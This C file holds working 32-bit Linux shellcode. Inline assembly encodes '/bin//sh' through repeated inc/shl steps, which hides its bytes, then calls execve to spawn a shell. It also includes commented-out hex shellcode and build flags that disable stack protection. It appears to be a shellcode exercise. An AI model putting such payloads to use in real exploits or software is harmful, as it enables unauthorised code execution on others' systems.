#include <stdio.h>

// gcc -m32 -fno-stack-protector -z execstack ./dummy.c -o ./dumm && ./dumm

// int main(void) {
//     char shellcode[] = "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80";
//     (*(void (*)()) shellcode)();
//     return 0;
// }

int main() {
    asm volatile(
        ".intel_syntax noprefix\n"
        "xor    eax, eax\n"
        "xor    ecx, ecx\n"
        "push   ecx\n"
        "inc    eax\n"
        "shl    eax,1\n"
        "inc    eax\n"
        "shl    eax,1\n"
        "shl    eax,1\n"
        "inc    eax\n"
        "shl    eax,1\n"
        "shl    eax,1\n"
        "shl    eax,1\n"
        "shl    eax,1\n"
        "shl    eax,1\n"
        "inc    eax\n"
        "shl    eax,1\n"
        "inc    eax\n"
        "shl    eax,1\n"
        "inc    eax\n"
        "shl    eax,1\n"
        "shl    eax,1\n"
        "shl    eax,1\n"
        "inc    eax\n"
        "shl    eax,1\n"
        "inc    eax\n"
        "shl    eax,1\n"
        "shl    eax,1\n"
        "shl    eax,1\n"
        "inc    eax\n"
        "shl    eax,1\n"
        "shl    eax,1\n"
        "inc    eax\n"
        "shl    eax,1\n"
        "inc    eax\n"
        "shl    eax,1\n"
        "inc    eax\n"
        "shl    eax,1\n"
        "inc    eax\n"
        "shl    eax,1\n"
        "shl    eax,1\n"
        "shl    eax,1\n"
        "inc    eax\n"
        "shl    eax,1\n"
        "shl    eax,1\n"
        "inc    eax\n"
        "shl    eax,1\n"
        "inc    eax\n"
        "shl    eax,1\n"
        "inc    eax\n"
        "shl    eax,1\n"
        "inc    eax\n"
        "push   eax\n"
        "xor    eax, eax\n" 
        "inc    eax\n"
        "shl    eax,1\n"
        "inc    eax\n"
        "shl    eax,1\n"
        "shl    eax,1\n"
        "inc    eax\n"
        "shl    eax,1\n"
        "inc    eax\n"
        "shl    eax,1\n"
        "inc    eax\n"
        "shl    eax,1\n"
        "shl    eax,1\n"
        "shl    eax,1\n"
        "inc    eax\n"
        "shl    eax,1\n"
        "inc    eax\n"
        "shl    eax,1\n"
        "shl    eax,1\n"
        "inc    eax\n"
        "shl    eax,1\n"
        "shl    eax,1\n"
        "shl    eax,1\n"
        "inc    eax  \n"
        "shl    eax,1\n"
        "shl    eax,1\n"
        "inc    eax\n"
        "shl    eax,1\n"
        "inc    eax\n"
        "shl    eax,1\n"
        "shl    eax,1\n"
        "shl    eax,1\n"
        "shl    eax,1\n"
        "inc    eax\n"
        "shl    eax,1\n"
        "shl    eax,1\n"
        "shl    eax,1\n"
        "shl    eax,1\n"
        "inc    eax\n"
        "shl    eax,1\n"
        "shl    eax,1\n"
        "inc    eax\n"
        "shl    eax,1\n"
        "inc    eax\n"
        "shl    eax,1\n"
        "inc    eax\n"
        "shl    eax,1\n"
        "inc    eax  \n"
        "push   eax\n"
        "xor    eax, eax\n"
        "mov    ebx, esp\n"
        "mov    al, 0xb\n"
        "xor    edx, edx\n"
        "int    0x80\n"
        ".att_syntax\n"
    );
}
